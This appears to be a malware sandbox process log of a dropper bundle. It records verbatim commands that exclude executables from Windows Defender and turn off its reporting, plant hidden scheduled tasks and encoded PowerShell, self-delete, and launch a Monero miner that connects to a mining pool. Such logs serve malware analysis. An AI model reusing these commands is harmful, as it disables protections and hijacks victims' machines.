\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZokipixH" /SC once /ST 00:41:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZokipixH"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZokipixH"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 10:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\eCiNxbZ.exe\" tt /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"6⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"7⤵
-
C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"6⤵
-
C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"6⤵
-
C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"6⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Checks processor information in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffeef8e4f50,0x7ffeef8e4f60,0x7ffeef8e4f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4012 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3144 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5480 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=164 /prefetch:28⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7372 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 73728⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7372 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 73728⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8088⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8528⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8928⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8808⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 9968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 10888⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 9888⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4916 -s 15648⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D4JGU.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-D4JGU.tmp\setup_2.tmp" /SL5="$3024E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5KGFI.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-5KGFI.tmp\setup_2.tmp" /SL5="$602C0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global8⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
      C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
        - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
      C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
        - Suspicious use of WriteProcessMemory
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19e4ade31b2a.exe
  cmdline: Sun19e4ade31b2a.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19eb40faaaa9.exe
  cmdline: Sun19eb40faaaa9.exe
  - Executes dropped EXE
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3788 -s 944
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19de8ff4b6aefeb8.exe
  cmdline: Sun19de8ff4b6aefeb8.exe /mixone
  - Executes dropped EXE
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 660
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 668
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 644
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 696
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 840
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 896
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1084
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1232
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1272
    - Program crash
  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1364
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1966fb31dd5a07.exe
  cmdline: Sun1966fb31dd5a07.exe
  - Executes dropped EXE
  C:\Users\Admin\AppData\Local\Temp\is-7565O.tmp\Sun1966fb31dd5a07.tmp
    cmdline: "C:\Users\Admin\AppData\Local\Temp\is-7565O.tmp\Sun1966fb31dd5a07.tmp" /SL5="$301D6,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1966fb31dd5a07.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    C:\Users\Admin\AppData\Local\Temp\is-6TD5V.tmp\Ze2ro.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\is-6TD5V.tmp\Ze2ro.exe" /S /UID=burnerch2
      C:\Program Files\Microsoft Office\IIQCOIDHKQ\ultramediaburner.exe
        cmdline: "C:\Program Files\Microsoft Office\IIQCOIDHKQ\ultramediaburner.exe" /VERYSILENT
        - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\is-BJTQO.tmp\ultramediaburner.tmp
          cmdline: "C:\Users\Admin\AppData\Local\Temp\is-BJTQO.tmp\ultramediaburner.tmp" /SL5="$B005E,281924,62464,C:\Program Files\Microsoft Office\IIQCOIDHKQ\ultramediaburner.exe" /VERYSILENT
          - Executes dropped EXE
          - Drops file in Program Files directory
          - Suspicious use of FindShellTrayWindow
          C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
            cmdline: "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
            - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\89-e4de5-a2f-79880-e6adb1c9a3da0\Kysholowapae.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\89-e4de5-a2f-79880-e6adb1c9a3da0\Kysholowapae.exe"
        - Executes dropped EXE
        - Checks computer location settings
      C:\Users\Admin\AppData\Local\Temp\0a-d2c83-a80-4f19d-7c01b86ee753a\Maneritaezho.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\0a-d2c83-a80-4f19d-7c01b86ee753a\Maneritaezho.exe"
        - Executes dropped EXE
        C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g2ujmou4.i2y\GcleanerEU.exe /eufive & exit
          C:\Users\Admin\AppData\Local\Temp\g2ujmou4.i2y\GcleanerEU.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\g2ujmou4.i2y\GcleanerEU.exe /eufive
            - Drops file in Drivers directory
            - Executes dropped EXE
            - Adds Run key to start application
        C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exe /qn CAMPAIGN="654" & exit
          C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exe /qn CAMPAIGN="654"
            - Executes dropped EXE
            - Loads dropped DLL
            - Enumerates connected drives
            - Modifies system certificate store
            - Suspicious use of FindShellTrayWindow
            C:\Windows\SysWOW64\msiexec.exe
              cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632307102 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nb2muvf2.k0k\anyname.exe & exit
